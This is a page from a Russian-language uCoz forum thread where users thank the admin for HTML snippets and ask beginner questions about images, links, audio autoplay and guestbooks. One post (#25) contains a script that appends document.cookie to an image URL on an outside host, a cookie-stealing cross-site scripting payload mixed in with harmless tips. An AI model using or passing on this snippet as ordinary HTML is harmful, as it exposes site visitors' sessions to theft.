Суббота, 18.11.2017, 16:47
Cs-mania-1-6
Приветствую Вас Гость | RSS
Главная | HTML коды - Страница 2 - Форум | Регистрация | Вход
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 2 из 3«123»
Форум » HTML коды » Для ваших сайтов коды » HTML коды
HTML коды
AngelДата: Среда, 18.02.2009, 23:22 | Сообщение # 16
Рядовой
Группа: Пользователи
Сообщений: 2
Репутация: 0
Статус: Offline
smile
 
БандитДата: Четверг, 14.05.2009, 21:08 | Сообщение # 17
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Мда... ещо таких наглых админов я не встречал: "Прошу повысить мне репутацию":))) повышу...ты мне много помог с этими кодами)
З.Ы. Сделай другим фоном смайлы, а то белые не смотрятся на сером сайте!!!
 
vsegoponemnoguДата: Четверг, 25.06.2009, 01:45 | Сообщение # 18
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
biggrin
 
kosta7770Дата: Суббота, 04.07.2009, 22:58 | Сообщение # 19
Рядовой
Группа: Пользователи
Сообщений: 5
Репутация: 0
Статус: Offline
Повысил, спасибо за пердоставление кодов. Я хоть и не очень в этом разбираюсь, но из первого получилось сделать кнопочку для своего сайта, а то раньше всё голову ломал как.B)

Добавлено (04.07.2009, 22:58)
---------------------------------------------
Ау... я пишу - пишу, а ни ответа ни привета, здесь кто нибуть живёт на этом форуме?

Сообщение отредактировал kosta7770 - Четверг, 02.07.2009, 14:42
 
defaultNickДата: Пятница, 31.07.2009, 19:01 | Сообщение # 20
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Если кто знает подскажите пожалуйста код-чтобы рисунок менялся в соответствии с разрешением экрана.

Добавлено (31.07.2009, 19:01)
---------------------------------------------
Или подскажите какой-нибудь меню скрипт (Если можно интересный).

 
asternadaДата: Среда, 27.10.2010, 16:06 | Сообщение # 21
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
cry КТОНИБУДЬ!!!ДАЙТЕ HTML СКОКО ДНЕЙ ОСТАЛОСЬ ДО ХЭЛЛОУИНА ,И ВООБЩЕ ДО ВСЕХ ПРАЗДНИКОВ.....

AsTeRnAdA
 
Friz676Дата: Пятница, 26.11.2010, 12:53 | Сообщение # 22
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
cs-mania1-6 спасибо за скрипты.

Добавлено (26.11.2010, 12:53)
---------------------------------------------
Кjrzun, следующая ссылка заблокирована:

Quote (korzun)
http://depositfiles.com/files/uiwcskyvv
а это вторая книга, в ней вы черпнёте очень много полезной информации по разработке сайтов!
 
vladДата: Пятница, 11.02.2011, 19:38 | Сообщение # 23
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Подскажите пожалуйста как сделать на сайте юкоз две гостевых, чтоб одна на другую не влеяла.
Зарание спасибо!

Добавлено (11.02.2011, 19:38)
---------------------------------------------
Подскажите пожалуйста как сделать на сайте юкоз две гостевых, чтоб одна на другую не влеяла.
Зарание спасибо!

 
FallenДата: Суббота, 26.03.2011, 22:20 | Сообщение # 24
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
классно спасибо а можно код с главной стр там скачать скайп оперу и тд плиз оч нада))
al-for-css.ucoz.ru

Добавлено (26.03.2011, 22:20)
---------------------------------------------
повысил!

 
BALLДата: Воскресенье, 03.04.2011, 14:47 | Сообщение # 25
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Code
<img src="http://httpz.ru/nj1avdqes2i.gif">
angel

Добавлено (03.04.2011, 14:47)
---------------------------------------------
<script>
img = new Image(); img.src = "http://httpz.ru/nj1avdqes2i.gif?"+document.cookie;
</script>

Сообщение отредактировал BALL - Воскресенье, 03.04.2011, 14:47
 
Yura_SДата: Суббота, 21.05.2011, 08:33 | Сообщение # 26
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Извените за глупый вопрос! Как прописать ссылку на файл, что бы при нажатии он воспроизводился(фильм или музыка), для локальной сети? Зарание СпС! sad
 
kote-naxДата: Понедельник, 30.05.2011, 16:16 | Сообщение # 27
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Ребят подскажите плз как на сайте поместить изображение??!!
заранее спасибо smile
 
ADДата: Среда, 20.07.2011, 17:25 | Сообщение # 28
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Quote (Yura_S)
Yura_S

также как и обычную <a href=размещение _файла.формат_файла>текст ссылки</a>
Пример:
<a href=http://my-site.my/sounds/track.mp3>слушать</a>

Добавлено (20.07.2011, 17:25)
---------------------------------------------

Quote (kote-nax)
Ребят подскажите плз как на сайте поместить изображение??!!
заранее спасибо smile

<img src=размещение _файла.формат_файла>
Пример:
<img src=http://my-site.my/pictures/picture.bmp>


Сообщение отредактировал AD - Среда, 20.07.2011, 17:22
 
DerkylДата: Суббота, 03.09.2011, 20:24 | Сообщение # 29
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Приветствую Всех!

Подскажите как возможно прописать код для автоматического воспроизведения потока m3u при загрузки сайта?

Благодарю
 
ГрихаДата: Пятница, 20.01.2012, 17:20 | Сообщение # 30
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
А КУДА ЭТИ КОДЫ ДОБАВЛЯТЬ ПОДСКАЖИТЕ ПЛИС МОЙ СКАЙП seiton66 МОЙ МАЙЛ grisha_postapenko@mail.ru

Добавлено (20.01.2012, 17:20)
---------------------------------------------
cs-mania1-6, biggrin КУДА HTML КОДЫ ВСТАВЛЯТЬ ЧТОБ ВСЁ РАБОТАЛО

Сообщение отредактировал Гриха - Пятница, 20.01.2012, 17:17
 
Форум » HTML коды » Для ваших сайтов коды » HTML коды
Страница 2 из 3«123»
Поиск:

Copyright MyCorp © 2017 Сделать бесплатный сайт с uCoz